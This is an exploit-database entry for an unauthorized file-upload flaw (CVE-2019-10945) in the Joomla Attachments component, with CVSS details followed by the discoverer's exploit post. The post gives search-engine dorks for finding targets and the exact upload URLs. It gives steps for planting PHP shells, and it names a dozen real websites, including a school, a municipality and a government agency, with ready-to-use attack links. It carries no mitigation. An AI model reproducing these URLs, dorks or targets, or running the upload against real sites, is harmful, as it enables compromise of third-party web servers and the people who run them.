Exploitalert - Database of Exploits

Joomla 3.9.6 Com_Attachments Components 3.x Unauthorized File Insertion

CVE	Category	Price	Severity
CVE-2019-10945	CWE-264	$500	High

Author	Risk	Exploitation Type	Date
Exploit Writer	High	Remote	2019-05-27

CVSS	EPSS	EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	Low	PR	The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope		S	An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2019050282

Joomla 3.9.6 Com_Attachments Components 3.x Unauthorized File Insertion

#################################################################### # Exploit Title : Joomla 3.9.6 Com_Attachments Components 3.x Unauthorized File Insertion # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 26/05/2019 # Vendor Homepage : jmcameron.net # Software Download Links : jmcameron.net/attachments/ jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip joomlacode.org/gf/project/attachments/frs/ github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/ # Software Information Links : extensions.joomla.org/extension/attachments/ joomlacode.org/gf/project/attachments/ joomlacode.org/gf/project/attachments3/ # Joomla Affected Versions : Joomla 3.4.8 Joomla 3.5.1 Joomla 3.6.5 Joomla 3.8.1 Joomla 3.8.11 Joomla 3.8.3 Joomla 3.9.6 # Software Affected Versions [ Component Com_Attachments ] : 2.2.2 and 3.2.6 - 3.x / All previous versions. # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:/index.php?option=com_attachments&task=upload intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved. intext:Treadmill Desk from TrekDesk intext:Copyright 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla intext:Fundacin Jesuitas Paraguay intext: 2019 Mars Society Polska intext:Designed by atict.com intext:Copyright 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com intext:Designed by Burosphere. intext:Conselho Nacional de Recursos Hdricos CNRH Ministerio Do Desenvolvimento Regional and more on Google and other Search Engines...... Have Fun.... # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt #################################################################### # Description about Software : *************************** The 'Attachments' extension allows files to be uploaded and attached to content articles in Joomla. Includes a plugin to display attachments and a component for uploading and managing attachments. #################################################################### # Impact : *********** Joomla Attachments Components 3.x and other previous versions could allow a remote attacker to upload arbitrary files upload/shell upload, caused by the improper validation of file extensions by the multiple scripts to index.php. The issue occurs because the application fails to adequately sanitize user-supplied input. Exploiting this issue will allow attackers to execute arbitrary code within the context of the affected application. This may facilitate unauthorized access or privilege escalation; other attacks may also possible. By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system. #################################################################### # Arbitrary File Upload/Unauthorized File Insertion Exploit : **************************************************** /index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme /index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme Click to " Select file to upload instead " - Fill the Form - Published => '' Yes '' and Click " Public " Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system. # Directory File Path : ******************** /attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt #################################################################### # Example Vulnerable Sites : ************************** [+] arpadter.reformatus.hu/index.php?option=com_attachments&task=upload&uri=file&parent_id=87&parent_type=com_content&tmpl=component&from=closeme [+] troop444.ebbids.com/index.php?option=com_attachments&task=upload&uri=file&parent_id=104&parent_type=com_content&tmpl=component&from=closeme [+] trekdesk.com/index.php?option=com_attachments&task=upload&uri=file&parent_id=11&parent_type=com_content&tmpl=component&from=closeme [+] xn--h1arefj.xn--p1ai/index.php?option=com_attachments&task=upload&uri=file&parent_id=8&parent_type=com_content&tmpl=component&from=closeme [+] ashleighd.co.za/index.php?option=com_attachments&task=upload&uri=file&parent_id=165&parent_type=com_content&tmpl=component&from=closeme [+] fundacionjesuitas.org.py/fundacionjesuitas/index.php?option=com_attachments&task=upload&uri=file&parent_id=41&parent_type=com_content&tmpl=component&from=closeme [+] cosmosdawn.net/index.php?option=com_attachments&task=upload&uri=file&parent_id=21&parent_type=com_content&tmpl=component&from=closeme [+] marssociety.pl/index.php?option=com_attachments&task=upload&uri=file&parent_id=5&parent_type=com_content&tmpl=component&from=closeme [+] grundschule-caeciliengroden.de/index.php?option=com_attachments&task=upload&uri=file&parent_id=7&parent_type=com_content&tmpl=component&from=closeme [+] biotecroma.it/index.php?option=com_attachments&task=upload&uri=file&parent_id=73&parent_type=com_content&tmpl=component&from=closeme [+] commune-ploudaniel.fr/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme [+] cnrh.gov.br/index.php?option=com_attachments&task=upload&uri=file&parent_id=89&parent_type=com_content&tmpl=component&from=closeme #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################

Impressum